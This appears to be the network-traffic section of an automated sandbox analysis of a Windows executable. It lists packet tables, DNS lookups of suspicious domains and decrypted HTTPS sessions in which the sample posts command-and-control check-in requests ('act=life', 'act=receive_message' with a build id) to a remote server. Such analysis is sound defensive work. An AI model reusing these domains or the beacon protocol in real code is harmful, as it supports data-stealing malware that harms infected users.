Mar 5, 2025 09:14:08.597734928 CET	49733	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:08.597744942 CET	443	49733	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:09.072818995 CET	443	49733	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:09.073657990 CET	49733	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:09.102112055 CET	49733	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:09.102148056 CET	443	49733	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:09.102571964 CET	443	49733	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:09.153459072 CET	49733	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:09.429481030 CET	49733	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:09.429481030 CET	49733	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:09.429666042 CET	443	49733	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:09.533632040 CET	443	49733	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:09.533691883 CET	443	49733	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:09.533744097 CET	443	49733	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:09.533746958 CET	49733	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:09.533765078 CET	443	49733	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:09.533808947 CET	49733	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:09.533813953 CET	443	49733	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:09.533878088 CET	443	49733	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:09.533917904 CET	49733	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:09.595477104 CET	49733	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:09.595477104 CET	49733	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:09.595500946 CET	443	49733	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:09.595510960 CET	443	49733	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:09.700053930 CET	49734	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:09.700104952 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:09.700167894 CET	49734	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:09.700592995 CET	49734	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:09.700602055 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.195939064 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.196038008 CET	49734	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:10.197279930 CET	49734	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:10.197285891 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.197514057 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.198756933 CET	49734	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:10.198788881 CET	49734	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:10.198817015 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.677723885 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.677758932 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.677826881 CET	49734	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:10.677836895 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.678112984 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.678139925 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.678168058 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.678179026 CET	49734	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:10.678184986 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.678205967 CET	49734	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:10.678237915 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.678277016 CET	49734	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:10.678281069 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.678646088 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.678694963 CET	49734	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:10.678699017 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.731522083 CET	49734	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:10.731540918 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.768151045 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.768182039 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.768205881 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.768224001 CET	49734	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:10.768234968 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.768274069 CET	49734	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:10.768481016 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.768526077 CET	49734	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:10.768574953 CET	49734	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:10.768585920 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.768604040 CET	49734	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:10.768613100 CET	443	49734	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.923909903 CET	49735	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:10.923938036 CET	443	49735	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:10.924025059 CET	49735	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:10.924309015 CET	49735	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:10.924324036 CET	443	49735	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:11.400680065 CET	443	49735	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:11.400799990 CET	49735	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:11.402266026 CET	49735	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:11.402275085 CET	443	49735	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:11.402540922 CET	443	49735	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:11.403810978 CET	49735	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:11.403942108 CET	49735	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:11.403975964 CET	443	49735	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:11.404026985 CET	49735	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:11.404036045 CET	443	49735	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:12.247270107 CET	443	49735	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:12.247360945 CET	443	49735	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:12.247431993 CET	49735	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:12.248457909 CET	49735	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:12.248476028 CET	443	49735	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:12.534950972 CET	49736	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:12.535003901 CET	443	49736	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:12.535082102 CET	49736	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:12.535535097 CET	49736	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:12.535543919 CET	443	49736	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:13.015903950 CET	443	49736	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:13.016025066 CET	49736	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:13.017390013 CET	49736	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:13.017402887 CET	443	49736	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:13.017648935 CET	443	49736	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:13.018889904 CET	49736	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:13.019025087 CET	49736	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:13.019062996 CET	443	49736	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:13.738018036 CET	443	49736	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:13.738091946 CET	443	49736	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:13.738140106 CET	49736	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:13.738325119 CET	49736	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:13.738343000 CET	443	49736	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:13.912997961 CET	49737	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:13.913055897 CET	443	49737	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:13.913140059 CET	49737	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:13.913392067 CET	49737	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:13.913408041 CET	443	49737	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:14.404454947 CET	443	49737	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:14.404588938 CET	49737	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:14.405802965 CET	49737	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:14.405812979 CET	443	49737	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:14.406040907 CET	443	49737	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:14.407179117 CET	49737	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:14.407294035 CET	49737	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:14.407327890 CET	443	49737	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:14.407396078 CET	49737	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:14.407404900 CET	443	49737	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:15.108345032 CET	443	49737	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:15.108427048 CET	443	49737	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:15.108529091 CET	49737	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:15.109256983 CET	49737	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:15.109285116 CET	443	49737	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:15.706163883 CET	49738	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:15.706207037 CET	443	49738	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:15.706391096 CET	49738	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:15.706834078 CET	49738	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:15.706845999 CET	443	49738	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:16.201523066 CET	443	49738	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:16.201597929 CET	49738	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:16.202799082 CET	49738	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:16.202809095 CET	443	49738	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:16.203069925 CET	443	49738	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:16.205760956 CET	49738	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:16.205845118 CET	49738	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:16.205873013 CET	443	49738	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:16.711846113 CET	443	49738	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:16.711922884 CET	443	49738	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:16.712059975 CET	49738	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:16.712214947 CET	49738	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:16.712235928 CET	443	49738	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:17.241878033 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.241924047 CET	443	49739	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:17.242331028 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.242331028 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.242362976 CET	443	49739	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:17.725066900 CET	443	49739	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:17.725239992 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.727807045 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.727821112 CET	443	49739	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:17.728028059 CET	443	49739	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:17.730221033 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.731780052 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.731823921 CET	443	49739	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:17.731937885 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.731961012 CET	443	49739	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:17.732047081 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.732095957 CET	443	49739	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:17.732196093 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.732220888 CET	443	49739	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:17.732523918 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.732542992 CET	443	49739	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:17.732671976 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.732701063 CET	443	49739	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:17.732707024 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.732834101 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.732861996 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.742897987 CET	443	49739	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:17.743057966 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.743083000 CET	443	49739	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:17.743098974 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.743110895 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.743119001 CET	443	49739	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:17.743205070 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.743232012 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.743261099 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.747878075 CET	443	49739	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:17.747983932 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:17.747999907 CET	443	49739	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:19.333689928 CET	443	49739	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:19.333956003 CET	443	49739	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:19.334415913 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:19.334415913 CET	49739	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:19.362485886 CET	49740	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:19.362521887 CET	443	49740	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:19.362746954 CET	49740	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:19.363075018 CET	49740	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:19.363090038 CET	443	49740	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:19.835403919 CET	443	49740	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:19.835557938 CET	49740	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:19.836910009 CET	49740	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:19.836921930 CET	443	49740	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:19.837150097 CET	443	49740	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:19.838463068 CET	49740	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:19.838479042 CET	49740	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:19.838529110 CET	443	49740	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:20.275473118 CET	443	49740	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:20.275582075 CET	443	49740	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:20.275698900 CET	49740	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:20.275845051 CET	49740	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:20.275891066 CET	443	49740	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:20.275924921 CET	49740	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:20.275940895 CET	443	49740	104.21.31.208	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 5, 2025 09:14:08.552721024 CET	58036	53	192.168.2.4	1.1.1.1
Mar 5, 2025 09:14:08.565690994 CET	53	58036	1.1.1.1	192.168.2.4
Mar 5, 2025 09:14:08.569261074 CET	56573	53	192.168.2.4	1.1.1.1
Mar 5, 2025 09:14:08.588639021 CET	53	56573	1.1.1.1	192.168.2.4
Mar 5, 2025 09:15:14.987674952 CET	50316	53	192.168.2.4	1.1.1.1
Mar 5, 2025 09:15:14.995368004 CET	53	50316	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 5, 2025 09:14:08.552721024 CET	192.168.2.4	1.1.1.1	0xe4d2	Standard query (0)	gadgethgfub.icu	A (IP address)	IN (0x0001)	false
Mar 5, 2025 09:14:08.569261074 CET	192.168.2.4	1.1.1.1	0x5d9b	Standard query (0)	explorebieology.run	A (IP address)	IN (0x0001)	false
Mar 5, 2025 09:15:14.987674952 CET	192.168.2.4	1.1.1.1	0xa033	Standard query (0)	tse1.mm.bing.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 5, 2025 09:14:08.565690994 CET	1.1.1.1	192.168.2.4	0xe4d2	Name error (3)	gadgethgfub.icu	none	none	A (IP address)	IN (0x0001)	false
Mar 5, 2025 09:14:08.588639021 CET	1.1.1.1	192.168.2.4	0x5d9b	No error (0)	explorebieology.run		104.21.31.208	A (IP address)	IN (0x0001)	false
Mar 5, 2025 09:14:08.588639021 CET	1.1.1.1	192.168.2.4	0x5d9b	No error (0)	explorebieology.run		172.67.179.246	A (IP address)	IN (0x0001)	false
Mar 5, 2025 09:15:14.995368004 CET	1.1.1.1	192.168.2.4	0xa033	No error (0)	tse1.mm.bing.net	mm-mm.bing.net.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 5, 2025 09:15:14.995368004 CET	1.1.1.1	192.168.2.4	0xa033	No error (0)	mm-mm.bing.net.trafficmanager.net	ax-0001.ax-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 5, 2025 09:15:14.995368004 CET	1.1.1.1	192.168.2.4	0xa033	No error (0)	ax-0001.ax-msedge.net		150.171.28.10	A (IP address)	IN (0x0001)	false
Mar 5, 2025 09:15:14.995368004 CET	1.1.1.1	192.168.2.4	0xa033	No error (0)	ax-0001.ax-msedge.net		150.171.27.10	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

explorebieology.run

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	104.21.31.208	443	7280	C:\Users\user\Desktop\JqGBbm7.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-05 08:14:09 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: explorebieology.run
2025-03-05 08:14:09 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-03-05 08:14:09 UTC	554	IN	HTTP/1.1 403 Forbidden Date: Wed, 05 Mar 2025 08:14:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GwZOFV9zTQ3%2BQTpnKiSI9XoZ65G2LSO67joJ0Xo2LPZjHOohStq4VSc8LYXqimAawSYGXi4Ia5Fd28aSZO3MYz2z5cyj%2BWXjqUbHskFeaL7rRx6LJkT07XiLJdrbXkngcROJzUDX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91b8287d39783ee0-EWR
2025-03-05 08:14:09 UTC	815	IN	Data Raw: 31 31 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2025-03-05 08:14:09 UTC	1369	IN	Data Raw: 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 Data Ascii: es/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('c
2025-03-05 08:14:09 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="
2025-03-05 08:14:09 UTC	1003	IN	Data Raw: 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e Data Ascii: f-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performan
2025-03-05 08:14:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	104.21.31.208	443	7280	C:\Users\user\Desktop\JqGBbm7.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-05 08:14:10 UTC	356	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=jbHAwUcAdytIGQtFfN58sTgYZjo1qwz1caz7LgJSFBs-1741162449-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 55 Host: explorebieology.run
2025-03-05 08:14:10 UTC	55	OUT	Data Raw: 61 63 74 3d 72 65 63 65 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 31 76 4a 49 76 6b 2d 2d 6d 69 78 2d 6c 61 62 73 2d 32 30 6b 26 6a 3d Data Ascii: act=receive_message&ver=4.0&lid=1vJIvk--mix-labs-20k&j=
